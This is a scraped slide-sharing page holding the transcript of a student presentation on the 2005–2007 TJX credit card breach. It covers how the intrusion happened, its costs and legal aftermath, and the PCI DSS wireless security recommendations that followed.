Ryan Paulsen Chris Lafferty Nilesh Nipane.  Intruders gained access to credit card information between 2005-2007  ~50 million credit card and debit.

Slides:



Advertisements
Similar presentations
GCSE ICT Networks & Security..
Advertisements

Payment Card Industry Data Security Standard AAFA ISC/SCLC Fall 08.
PCI-DSS Erin Benedictson Information Security Analyst AAA Oregon/Idaho.
JEFF WILLIAMS INFORMATION SECURITY OFFICER CALIFORNIA STATE UNIVERSITY, SACRAMENTO Payment Card Industry Data Security Standard (PCI DSS) Compliance.
1 Chapter 8 Fundamentals of System Security. 2 Objectives In this chapter, you will: Understand the trade-offs among security, performance, and ease of.
Computer viruses Hardware theft Software Theft Unauthorized access by hackers Information Theft Computer Crimes.
2 Issues of the information age Computer _______ and mistakes –Preventing computer related waste & mistakes Computer crime –Computer as tool to commit.
Protection from Internet Theft By James Seegars. What Is Hacking? Definition – A)To change or alter(Computer Program) – B) To gain access to (a computer.
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
E-Commerce Security Issues. General E-Business Security Issues Any E-Business needs to be concerned about network security. The Internet is a “ public.
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
Payment Card Industry (PCI) Data Security Standard (DSS) Compliance Commonwealth of Massachusetts Office of the State Comptroller March 2007.
Facts, Issues, and Considerations 7 May 2008 Steven Barnett Identity Theft.
GPUG ® Summit 2011 November 8-11 Caesars Palace – Las Vegas, NV Payment Processing Online and Within Dynamics GP PCI Compliance and Secure Payment Processing.
Wireless Encryption By: Kara Dolansky Network Management Spring 2009.
Security Management IACT 918 July 2004 Gene Awyzio SITACS University of Wollongong.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Why Comply with PCI Security Standards?
Northern KY University Merchant Training
Payment Card Industry (PCI) Data Security Standard
Brian Bradley.  Data is any type of stored digital information.  Security is about the protection of assets.  Prevention: measures taken to protect.
Chapter 3 Application Level Security in Wireless Network IWD2243 : Zuraidy Adnan : Sept 2012.
Network security policy: best practices
The Difficult Road To Cybersecurity Steve Katz, CISSP Security Risk Solutions Steve Katz, CISSP Security.
New Data Regulation Law 201 CMR TJX Video.
E-business Security Dana Vasiloaica Institute of Technology Sligo 22 April 2006.
Security. If I get 7.5% interest on $5,349.44, how much do I get in a month? (.075/12) = * 5, = $ What happens to the.004? =
An Introduction to PCI Compliance. Data Breach Trends About PCI-SSC 12 Requirements of PCI-DSS Establishing Your Validation Level PCI Basics Benefits.
(2011) Security Breach Compromises 75,000 Staff/Student Social Security Numbers Image from this Site Presenters: Aron Eisold, Matt Mickelson, Bryce Nelson,
Teresa Macklin Information Security Officer 27 May, 2009 Campus-wide Information Security Activities.
General Awareness Training
PCI requirements in business language What can happen with the cardholder data?
Defining Security Issues
Describe How Software and Network Security Can Keep Systems and Data Secure P3. M2 and D1 Unit 7.
BUSINESS B1 Information Security.
Business Computing 550 Lesson 6. 2 Security Threats on Web Sites Issues and vulnerabilities 1.Illegal Access and Use (Hacking the system or users exposing.
Wireless Network Security Dr. John P. Abraham Professor UTPA.
Cyber Security. Security – It’s About Layers There’s no one stop solution to protection Each layer you add, an additional tool will be needed to pierce.
Lesson 20-Wireless Security. Overview Introduction to wireless networks. Understanding current wireless technology. Understanding wireless security issues.
Copyright © 2013 by The McGraw-Hill Companies, Inc. All rights reserved. McGraw-Hill/Irwin Business Plug-In B6 Information Security.
Internet of Things Top Ten. Agenda -Introduction -Misconception -Considerations -The OWASP Internet of Things Top 10 Project -The Top 10 Walkthrough.
PRIVACY, SECURITY & ID THEFT PREVENTION - TIPS FOR THE VIGILANT BUSINESS - SMALL BUSINESS & ECONOMIC DEVELOPMENT FORUM October 21, WITH THANKS TO.
G061 - Network Security. Learning Objective: explain methods for combating ICT crime and protecting ICT systems.
 Jaden Terry.  To obtain privacy and protect data from other people. o Businesses Customer/Employee information Credit card numbers To gain a competitive.
Wireless Intrusion Prevention System
ThankQ Solutions Pty Ltd Tech Forum 2013 PCI Compliance.
1 Payment Card Industry (PCI) Security Standard Developed by the PCI Security Council formed by major card issuers: Visa, MasterCard, American Express,
Computer Security By Duncan Hall.
APolicy EASy Security Project Analysis and Recommendations for TJX Companies, Inc.
(2011) Security Breach Compromises 75,000 Staff/Student Social Security Numbers Image from this Site Presenters: Aron Eisold, Matt Mickelson, Bryce Nelson,
1 Law, Ethical Impacts, and Internet Security. 2 Legal Issues vs. Ethical Issues Ethics — the branch of philosophy that deals with what is considered.
1 © 2004, Cisco Systems, Inc. All rights reserved. Wireless LAN (network) security.
By: Ted Worthington.  About TJ Max  Discovery  How the break in occurred  The Payment Card Industry-Data Security Standard  Lawsuit and Investigation.
Computer Security Sample security policy Dr Alexei Vernitski.
By: Matt Winkeler.  PCI – Payment Card Industry  DSS – Data Security Standard  PAN – Primary Account Number.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
Information Systems Design and Development Security Precautions Computing Science.
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle branded credit.
Chapter 14.  Upon completion of this chapter, you should be able to:  Identify different types of Intrusion Detection Systems and Prevention Systems.
Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.
Performing Risk Analysis and Testing: Outsource or In-house
Payment Card Industry (PCI) Data Security Standard (DSS) Compliance
Working at a Small-to-Medium Business or ISP – Chapter 8
Secure Software Confidentiality Integrity Data Security Authentication
MIS 5121: Real World Control Failure - TJX
Payment Card Industry (PCI) Data Security Standard (DSS) Compliance
Payment Card Industry (PCI) Data Security Standard (DSS) Compliance
Network hardening Chapter 14.
G061 - Network Security.
6. Application Software Security
Presentation transcript:

Ryan Paulsen Chris Lafferty Nilesh Nipane

 Intruders gained access to credit card information between  ~50 million credit card and debit card numbers stolen  ½ million driver’s license and SSN stolen  Largest theft to date  Previous was 1.5 million credit card numbers

 WEP key crack at St. Paul Marshalls store  Hackers monitor and gather network traffic  Gather data and crack encryption key for traffic destined for central database  Gathered usernames and password from decrypted traffic  Created accounts in TJX systems

 Create accounts on central database systems in Framingham, MA  Gathered historical data from storage systems ▪ Used by TJX to track returns  Install specially made blabla sniffer tool gathering credit card numbers before they were encrypted ▪ Hackers then logged into the systems and transferred data files off of the system  Used in Wal-Mart gift card scam ($1 Million)

 Monetary Cost/Loss for nearly all involved  Customers may lose money/time or other resources directly  Banks lose customers or reputation points  TJX loses substantial amounts of money ▪ Approximately $1.5 billion to fees, settlements, and new security measures mandated by FTC ▪ More than $195 million in new security equipment and training

 Reputation/Business costs  Customer confidence  Federal Trade Commission’s response  Ethical and Policy Implications/Movements  Ethical concerns of information protection, misuse of resources, privacy, etc.

 Impacts still being felt and analyzed…  Legal Issues / Legislation insufficiencies  The full extent of these attacks and just how many systems were attacked by the same people (still finding out of new cases today)  The actions and lack of actions being taken in response by other companies

 2004 audit found failure of 9/12 criterion for credit card merchants  Misconfigured wireless networks  Poor antivirus protected  Weak intrusion detection  Easily crackable usernames and passwords  Poor log maintenance  Failed to install data encryption software

 Initial Breach  Due to deficiencies in the wireless network and WEP encryption scheme ▪ WEP is known to be broken since (FMS attack)  Collected data transmitted by handheld devices used to communicate price markdowns and to manage inventory ▪ Used that data to crack the encryption code.

 Other Vulnerabilities  Kiosks, equipped with USB drives, were located in many of TJX's retail stores ▪ Allowed direct access to the company's network and were not protected by firewall

 Feds tracked down and arrested 11 coconspirators  Discovered credit theft ring known as “Operation Get Rich or Die Trying”  Led by Albert Gonzalez  Ring responsible for most major credit card thefts in US ▪ Including Homestead breach which is now the largest of its kind

 Class Action Lawsuits  TJX reluctant to disclose data on the breach  Failed to detect for 7 months, took another month to disclose  Prosecutors hope to show negligence  Watershed Case  Companies now must be more open and transparent about how they protect customer data

 PCI Security Standards Council Data Security Standard (DSS)  Special recommendations published July 2009 for wireless networks  Covers best practices in relation to processing credit card information around wireless networks

 Wireless Intrusion Detection/Prevention System (IDS/IPS)  Investigate and classify wireless networks and their access to customer data  Create automatic alerts of rouge wireless connections  Response plans to remove rouge connections

 Filter wireless networks that do not need access to customer data with firewall  Do NOT use VLAN separation  Monitor rules every 6 months From Information Supplement: PCI DSS Wireless Guideline

 Protect wireless networks that transmit card holder data  Physical protection ▪ Secure access points so no one can reset to factory defaults ▪ Make sure access points aren’t stolen ▪ Don’t store PSKs in obvious locations

 Protect wireless networks that transmit card holder data  Change default configuration ▪ Use enterprise mode when possible ▪ Do not advertise company name in SSID ▪ Only use SNMPv3 ▪ Disable unnecessary ports and protocols

 Protect wireless networks that transmit card holder data  Logging and Monitoring ▪ Store event logs for 90 days ▪ Maintain updates to network topology  Security ▪ Use AES when possible ▪ Use enterprise security when possible ▪ 13 character PSK

 Protect wireless networks that transmit card holder data  Encryption ▪ Use SSLv3 with 256 bit encryption ▪ Treat wireless networks as outside network From Information Supplement: PCI DSS Wireless Guideline

 Chapter 6 – Database Security  Chapter 7 – Security in Computing  Chapter 9 – Economics of Cybersecurity  Chapter 10 – Privacy  Chapter 11 – Cryptography Explained

  s.pdf s.pdf     ,00.html ,00.html  ,00.html ,00.html  ,00.html ,00.html   id=AW4H134JQ43VXQE1GHOSKHWATMY32JVN?articleID= id=AW4H134JQ43VXQE1GHOSKHWATMY32JVN?articleID=   heartland/ heartland/

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.